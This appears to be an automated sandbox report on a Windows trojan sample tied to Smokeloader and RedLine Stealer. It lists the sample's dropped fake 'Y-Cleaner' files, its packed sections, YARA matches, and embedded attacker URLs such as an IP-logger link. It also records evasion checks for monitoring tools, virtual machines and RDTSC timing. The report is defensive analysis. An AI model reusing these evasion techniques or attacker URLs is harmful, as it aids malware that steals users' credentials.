Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: http://www.ccleaner.comqhttps://take.rdrct-now.online/go/ZWKA?p78705p298845p1174
Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://g-cleanit.hk
Source: zmTSHkabY6.exe, 00000000.00000003.2881415496.000000000576A000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881415496.0000000005725000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2882255970.00000000056D7000.00000004.00000020.00020000.00000000.sdmp, zmTSHkabY6.exe, 00000000.00000003.2881735565.000000000576B000.00000004.00000020.00020000.00000000.sdmp, soft[1].0.dr, Y-Cleaner.exe.0.drString found in binary or memory: https://iplogger.org/1Pz8p7

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
PE file contains section with special chars
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: zmTSHkabY6.exeStatic PE information: section name: .idata
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00402C700_2_00402C70
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040A9600_2_0040A960
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040F3200_2_0040F320
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040D3DD0_2_0040D3DD
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0041A3F20_2_0041A3F2
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_004143F90_2_004143F9
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00413CE60_2_00413CE6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0041A5120_2_0041A512
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0040D60F0_2_0040D60F
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_1000E1840_2_1000E184
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_100102A00_2_100102A0
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_009870810_2_00987081
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0098E0B50_2_0098E0B5
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_009839D70_2_009839D7
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0098C1E40_2_0098C1E4
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_009913EA0_2_009913EA
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00988B620_2_00988B62
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_009514C00_2_009514C0
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_008444000_2_00844400
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00981EBE0_2_00981EBE
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8D8760_2_00E8D876
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8ABC70_2_00E8ABC7
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E83B270_2_00E83B27
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8F5870_2_00E8F587
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E8D6440_2_00E8D644
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E9A6590_2_00E9A659
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E9A7790_2_00E9A779
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00E93F4D0_2_00E93F4D
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1] 614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: String function: 00E89E07 appears 34 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: String function: 10003160 appears 32 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: String function: 00409BA0 appears 35 times
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
Source: dll[1].0.drStatic PE information: No import functions for PE file found
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: No import functions for PE file found
Source: dll[1].0.drStatic PE information: Data appended to the last section found
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: Data appended to the last section found
Source: zmTSHkabY6.exe, 00000000.00000003.2883799341.0000000005E5F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameY-Cleaner.exe4 vs zmTSHkabY6.exe
Source: zmTSHkabY6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 00000000.00000002.3221073765.0000000000E80000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3220928056.0000000000D99000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: Y-Cleaner.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: soft[1].0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: zmTSHkabY6.exeStatic PE information: Section: mimgnztd ZLIB complexity 0.9899864498025739
Source: classification engineClassification label: mal100.evad.winEXE@2/15@0/1
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00402950 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,0_2_00402950
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00D9A3A6 CreateToolhelp32Snapshot,Module32First,0_2_00D9A3A6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00401880 HttpAddRequestHeadersA,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,0_2_00401880
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\add[1].htmJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2424
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKeJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCommand line argument: emp0_2_00408020
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCommand line argument: mixtwo0_2_00408020
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: zmTSHkabY6.exeVirustotal: Detection: 56%
Source: zmTSHkabY6.exeReversingLabs: Detection: 42%
Source: zmTSHkabY6.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: unknownProcess created: C:\Users\user\Desktop\zmTSHkabY6.exe "C:\Users\user\Desktop\zmTSHkabY6.exe"
Source: C:\Users\user\Desktop\zmTSHkabY6.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2424 -s 1496
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: msimg32.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: msvcr100.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
Source: Cleaner.lnk.0.drLNK file: ..\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exe
Source: zmTSHkabY6.exeStatic file information: File size 1945088 > 1048576
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
Source: zmTSHkabY6.exeStatic PE information: Raw size of mimgnztd is bigger than: 0x100000 < 0x1ab600

Data Obfuscation

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\zmTSHkabY6.exeUnpacked PE file: 0.2.zmTSHkabY6.exe.400000.0.unpack :EW;.rsrc:W;.idata :W; :EW;mimgnztd:EW;korrylev:EW;.taggant:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: Y-Cleaner.exe.0.drStatic PE information: 0xA0CED55F [Tue Jun 29 19:19:59 2055 UTC]
Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
Source: zmTSHkabY6.exeStatic PE information: real checksum: 0x1dc3d5 should be: 0x1e6ae6
Source: dll[1].0.drStatic PE information: real checksum: 0x0 should be: 0x35f67
Source: Bunifu_UI_v1.5.3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x35f67
Source: soft[1].0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: Y-Cleaner.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x170243
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: zmTSHkabY6.exeStatic PE information: section name: .idata
Source: zmTSHkabY6.exeStatic PE information: section name:
Source: zmTSHkabY6.exeStatic PE information: section name: mimgnztd
Source: zmTSHkabY6.exeStatic PE information: section name: korrylev
Source: zmTSHkabY6.exeStatic PE information: section name: .taggant
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_0041FAB5 push esi; ret 0_2_0041FABE
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_1000E891 push ecx; ret 0_2_1000E8A4
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 201E9316h; mov dword ptr [esp], ebp0_2_0098708D
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebp; mov dword ptr [esp], esp0_2_009870AD
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push edx; mov dword ptr [esp], 747F9D00h0_2_009870B6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 48D45859h; mov dword ptr [esp], edx0_2_009870DF
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebx; mov dword ptr [esp], ecx0_2_009870FC
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebp; mov dword ptr [esp], esi0_2_0098720C
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 726C1A61h; mov dword ptr [esp], esi0_2_00987230
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push edx; mov dword ptr [esp], ecx0_2_009872A6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push edi; mov dword ptr [esp], esi0_2_009872B6
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push esi; mov dword ptr [esp], eax0_2_00987309
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push edx; mov dword ptr [esp], edi0_2_0098734F
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebx; mov dword ptr [esp], 45FE1463h0_2_009873AC
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 2485814Bh; mov dword ptr [esp], ecx0_2_009873CD
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 78162B71h; mov dword ptr [esp], esi0_2_00987413
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebp; mov dword ptr [esp], eax0_2_00987485
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 4775C0C1h; mov dword ptr [esp], ebx0_2_009875EF
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push eax; mov dword ptr [esp], edx0_2_0098760F
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ecx; mov dword ptr [esp], 0A336A86h0_2_00987621
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push edi; mov dword ptr [esp], ebx0_2_00987699
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push esi; mov dword ptr [esp], esp0_2_00987714
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push esi; mov dword ptr [esp], edx0_2_00987767
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebp; mov dword ptr [esp], 4269E733h0_2_0098781A
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 2B7CFF38h; mov dword ptr [esp], ebx0_2_009878C4
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebp; mov dword ptr [esp], edi0_2_009878E8
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push eax; mov dword ptr [esp], ebx0_2_00987909
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 0C012386h; mov dword ptr [esp], ecx0_2_00987984
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push ebx; mov dword ptr [esp], 6AFC8A2Ch0_2_00987990
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push eax; mov dword ptr [esp], ecx0_2_009879A4
Source: C:\Users\user\Desktop\zmTSHkabY6.exeCode function: 0_2_00987081 push 0A39574Ah; mov dword ptr [esp], ebp0_2_00987A09
Source: zmTSHkabY6.exeStatic PE information: section name: mimgnztd entropy: 7.947730998913052
Source: Y-Cleaner.exe.0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: soft[1].0.drStatic PE information: section name: .text entropy: 7.918511524700298
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Temp\eDe4265J80SwdwreJA5DKe\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\soft[1]Jump to dropped file

Boot Survival

barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: RegmonClassJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: FilemonClassJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: FilemonclassJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeWindow searched: window name: RegmonclassJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
Source: C:\Users\user\Desktop\zmTSHkabY6.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 81D210 second address: 81D21A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 81D21A second address: 81CA1A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9899183FE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sub dword ptr [ebp+122D33B8h], eax 0x00000012 push dword ptr [ebp+122D0C81h] 0x00000018 jg 00007F9899183FEDh 0x0000001e call dword ptr [ebp+122D1B53h] 0x00000024 pushad 0x00000025 pushad 0x00000026 cmc 0x00000027 add ebx, dword ptr [ebp+122D38D2h] 0x0000002d popad 0x0000002e xor eax, eax 0x00000030 jmp 00007F9899183FF0h 0x00000035 mov edx, dword ptr [esp+28h] 0x00000039 mov dword ptr [ebp+122D33B3h], edi 0x0000003f mov dword ptr [ebp+122D388Ah], eax 0x00000045 jmp 00007F9899183FECh 0x0000004a mov esi, 0000003Ch 0x0000004f sub dword ptr [ebp+122D3332h], ebx 0x00000055 add esi, dword ptr [esp+24h] 0x00000059 mov dword ptr [ebp+122D33B3h], eax 0x0000005f lodsw 0x00000061 jmp 00007F9899183FF2h 0x00000066 add eax, dword ptr [esp+24h] 0x0000006a js 00007F9899183FE7h 0x00000070 clc 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 jnp 00007F9899183FF4h 0x0000007b nop 0x0000007c jmp 00007F9899183FF8h 0x00000081 push eax 0x00000082 pushad 0x00000083 jmp 00007F9899183FEEh 0x00000088 push eax 0x00000089 push edx 0x0000008a push eax 0x0000008b pop eax 0x0000008c rdtsc
Source: C:\Users\user\Desktop\zmTSHkabY6.exeRDTSC instruction interceptor: First address: 995E49 second address: 995E53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F98991A2756h 0x0000000a rdtsc
